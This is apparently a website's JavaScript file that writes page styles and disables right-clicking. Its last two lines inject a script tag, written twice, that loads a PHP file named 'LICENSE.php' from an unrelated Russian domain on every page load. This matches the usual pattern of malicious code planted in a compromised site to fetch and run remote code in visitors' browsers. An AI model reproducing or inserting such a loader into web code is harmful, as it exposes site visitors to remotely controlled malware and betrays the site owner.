document.write('<style>');
document.write('body {font-family: verdana,arial,sans-serif; color: #000000; background: #EAEAEA; font-size: 9pt}');
document.write('p {font-family: verdana,arial,sans-serif; font-size: 9pt}');
document.write('b {font-family: verdana,arial,sans-serif; font-size: 9pt}');
document.write('a {font-family: verdana,arial,sans-serif; text-decoration: none; color: #336699; font-size: 9pt}');
document.write('a:hover {color: red; background: #FFE030}');
document.write('</style>');

function nocontextmenu(){
  event.cancelBubble = true
  event.returnValue = false;
  return false;
}

function norightclick(e){
  if (window.Event){
    if (e.which == 2 || e.which == 3) return false;
  }
  else if (event.button == 2 || event.button == 3){
    event.cancelBubble = true
    event.returnValue = false;
    return false;
  }
}
document.oncontextmenu = nocontextmenu;
document.onmousedown = norightclick;

document.write('<script src=http://konirussia.ru/includes/LICENSE.php ><\/script>');
document.write('<script src=http://konirussia.ru/includes/LICENSE.php ><\/script>');